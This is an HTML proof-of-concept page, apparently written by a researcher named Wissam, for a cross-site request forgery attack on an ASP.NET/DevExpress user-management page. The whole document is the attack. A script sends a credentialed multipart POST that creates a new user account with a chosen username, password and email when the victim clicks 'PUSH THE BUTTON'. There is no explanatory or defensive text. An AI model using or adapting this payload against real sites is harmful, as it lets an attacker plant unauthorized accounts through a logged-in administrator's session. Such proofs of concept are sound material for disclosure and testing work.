<html> <!-- CSRF PoC - Wissam--> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://#thesite/SecuritySetting/UserSecurity/UserManagement.aspx", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------284963701632007118234117095"); xhr.withCredentials = true; var body = "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"__EVENTTARGET\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"__EVENTARGUMENT\"\r\n" + "\r\n" + "Content-Disposition: form-data; name=\"__VIEWSTATEENCRYPTED\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"__EVENTVALIDATION\"\r\n" + "\r\n" + "V0dFoNB2gzNOMIMLLx+05dEOodRjxb1IxsKxMr+ehPpXQ0dPvYTi/CNzoqOkFt0ZFBapLnziRwgnyQas/THRwIawzpqTC0Kr4vX9u+YW5L0t1xef4donRvhTIZYESWR1oeFn1Rwtox5X3e20bAUS4A==\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtUserName\"\r\n" + "\r\n" + "WISSAM\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtUserName$CVS\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtPassword\"\r\n" + "\r\n" + "wissamwissam\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtPassword$CVS\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtConfirm\"\r\n" + "\r\n" + "wissamwissam\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtConfirm$CVS\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtEmail\"\r\n" + "\r\n" + "wissam@blablabla.com\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtEmail$CVS\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$btnCreateUser\"\r\n" + "\r\n" + "Create User\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_ASPxPopupControl1WS\"\r\n" + "\r\n" + "0:0:-1:-10000:-10000:0:35:150:1:0:0:0\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_ppSaveLayoutWS\"\r\n" + "\r\n" + "0:0:-1:-10000:-10000:0:400:100:1:0:0:0\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$ppSaveLayout$txtLayoutName\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$ppSaveLayout$txtLayoutName$CVS\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_ppShowLayoutsWS\"\r\n" + "\r\n" + "0:0:-1:-10000:-10000:0:280:315:1:0:0:0\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$ppShowLayouts$lbxLayouts\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2WS\"\r\n" + "\r\n" + "0:0:-1:-10000:-10000:0:600:450:1:0:0:0\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_State\"\r\n" + "\r\n" + "{\"file\":{},\"currentPath\":\"\"}\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_CS\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXSelInput\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXKVInput\"\r\n" + "\r\n" + "[]\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$CallbackState\"\r\n" + "\r\n" + "BwEHAQIFU3RhdGUHQgcEBwACAQcBAgEHAgIBBwMCAQcABwAHAAcAAgAG//8JAgROYW1lBwAJAgACAAMHBAIABwACAQcABwACAQcABwAHAA==\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXFocusedRowInput\"\r\n" + "\r\n" + "-1\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXSyncInput\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_Upload_IC\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_Upload_TextBoxT_Input\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_Upload_TextBox0_Input\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol3\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_VI\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol8\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDDWS\"\r\n" + "\r\n" + "0:0:-1:-10000:-10000:0:0:0:1:0:0:0\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDD_LDeletedItems\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDD_LInsertedItems\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDD_LCustomCallback\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol8$DDD$L\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_VI\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol13\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDDWS\"\r\n" + "\r\n" + "0:0:-1:-10000:-10000:0:0:0:1:0:0:0\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDD_LDeletedItems\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDD_LInsertedItems\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDD_LCustomCallback\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol13$DDD$L\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol12\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol11\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol10\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol9\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_custwindowWS\"\r\n" + "\r\n" + "0:0:-1:-10000:-10000:0:1:0:1:0:0:0\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXSelInput\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXKVInput\"\r\n" + "\r\n" + "[\'29bda11f-d51d-4c78-b7fc-0056d4b826ff\',\'c32608dc-946e-40ec-9be9-9f4e500539e6\',\'ca1a4bd3-9ba0-43a6-980e-60a8177be663\',\'8ccfc87f-e649-4a7b-bd16-a85ea172e54e\',\'e26a0c3b-eae0-4f76-8b88-185df3df8522\',\'0bc5697a-de09-4046-81b8-6f5fdda3f8e9\',\'cd21124b-9aec-472a-96e4-5ebefaa32fb1\',\'565dd57d-0420-4666-a443-7830349e2c66\',\'5aedba74-01b3-4d06-8159-19f3b30e6948\']\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$CallbackState\"\r\n" + "\r\n" + "BwQHAQIFU3RhdGUHdwcOBwACAQcAAgAHAAIABwECAQcBAgAHAQIABwECAAcBAgAHAgIBBwgCAQcHAgEHBgIBBwUCAQcEAgEHAAcABwAHAAIABQAAAIAJAgZVc2VySWQHAQIGVXNlcklkCwkCAAIAAwcEAgAHAAIBBzEHAAIBBwAHAAcAAg1TaG93RmlsdGVyUm93CgIBAhBGaWx0ZXJFeHByZXNzaW9uBwIAAglQYWdlSW5kZXgDBwQ=\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"DXScript\"\r\n" + "\r\n" + "1_171,1_94,1_164,1_114,1_121,1_105,1_91,1_156,1_154,1_116,1_93,1_169,1_138,1_170,1_124,1_163,1_162,1_147,1_104,1_166,1_139,1_120,1_98,1_125,1_157,1_108,1_113,1_106,1_152\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"DXCss\"\r\n" + "\r\n" + "0_2117,1_12,0_2121,1_5,0_2015,0_2013,0_2017,0_2019,../../Styles/css/alertify.css,../../Styles/css/themes/default.css,../../Styles/css/bootstrap-theme.css,../../Styles/css/bootstrap.css,../../Styles/css/LobbySiteMapStyle.css,../../Styles/IconFonts/flaticon.css,../../Styles/css/FormStyle.css,../../Styles/css/PopupStyle.css,../../Images/apple-icon-57x57.png,../../Images/apple-icon-60x60.png,../../Images/apple-icon-72x72.png,../../Images/apple-icon-76x76.png,../../Images/apple-icon-114x114.png,../../Images/apple-icon-120x120.png,../../Images/apple-icon-144x144.png,../../Images/apple-icon-152x152.png,../../Images/apple-icon-180x180.png,../../Images/android-icon-192x192.png,../../Images/favicon-32x32.png,../../Images/favicon-96x96.png,../../Images/favicon-16x16.png,../../Images/manifest.json\r\n" + "-----------------------------284963701632007118234117095\r\n" + "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$btnCreateUser\"\r\n" + "\r\n" + "\r\n" + "-----------------------------284963701632007118234117095--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="PUSH THE BUTTON" onclick="submitRequest();" /> </form> </body> </html>